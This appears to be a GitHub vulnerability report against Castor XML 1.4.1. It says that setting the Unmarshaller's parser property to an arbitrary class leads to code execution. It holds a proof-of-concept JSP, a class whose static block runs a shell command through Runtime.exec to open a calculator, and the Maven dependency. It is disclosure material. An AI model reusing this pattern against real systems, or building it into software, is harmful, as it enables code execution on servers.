Skip to content

Security vulnerability Code execution  #91

Description

@amakerlee

Code execution when set the Property of the Unmarshaller

image

Send the request

  • Payload: any string

http://127.0.0.1:8080/xxxxxx/castor.jsp?param=any-string

image

<%@ page contentType="text/html;charset=UTF-8"  pageEncoding="UTF-8" %>
<%@ page import="java.io.ByteArrayInputStream" %>
<%@ page import="org.exolab.castor.xml.Unmarshaller" %>
<%@ page import="javax.xml.transform.stream.StreamSource" %>

<%
    try {
        String parameter = request.getParameter("param");
        ByteArrayInputStream is = new ByteArrayInputStream(parameter.getBytes());
        Unmarshaller unmarshaller = new Unmarshaller();
        unmarshaller.setProperty("org.exolab.castor.parser", "test.security.CmdTest");
        unmarshaller.unmarshal(new StreamSource(is));
    } catch (Exception e) {
        e.printStackTrace();
    }
    out.println("over....");
%>
package test.security;

public class CmdTest {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash","-c","open -a Calculator.app"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
        }
    }
}
<dependency>
  <groupId>org.codehaus.castor</groupId>
  <artifactId>castor-xml</artifactId>
  <version>1.4.1</version>
</dependency>

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Fields

    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions